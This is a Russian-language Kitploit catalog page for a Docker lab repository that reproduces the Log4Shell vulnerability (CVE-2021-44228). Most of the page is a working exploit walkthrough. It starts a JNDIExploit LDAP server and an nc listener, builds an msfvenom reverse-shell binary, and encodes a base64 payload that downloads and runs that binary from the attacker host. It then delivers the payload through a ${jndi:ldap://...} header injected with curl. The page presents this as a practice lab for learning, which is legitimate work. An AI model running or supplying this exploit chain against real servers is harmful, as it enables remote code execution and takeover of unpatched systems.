Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker Env | Kitploit
Инструменты/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker Env

Репозиторий
4144 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Среда воспроизведения Log4Shell

Описание примера

IP атакуемой машины: 47.47.47.47

IP атакующей машины: 48.48.48.48

Запуск уязвимого Docker на атакуемой машине

  • Используйте DockerFile для сборки образа Docker и запуска:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Запуск атакующего Docker на атакующей машине

  • Используйте DockerFile для сборки образа Docker и запуска
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Подготовка среды атакующей машины

Выполните команды в трех разных оболочках, убедитесь, что оболочки активны.

  • Запустите сервер JNDI на атакующей машине
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • Запустите HTTP-сервер на атакующей машине
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • Запустите прослушивание порта с помощью nc на атакующей машине
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Реализация атаки с атакующей машины

Выполните команды в той же оболочке

root@kitploit:~
docker exec -it attack /bin/bash
  • Подготовьте файл обратного шелла на атакующей машине
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Подготовьте payload на атакующей машине
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Отправьте атакующий payload
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Генерация команд

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Видеодемонстрация

Video

Ссылки

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Скачать инструмент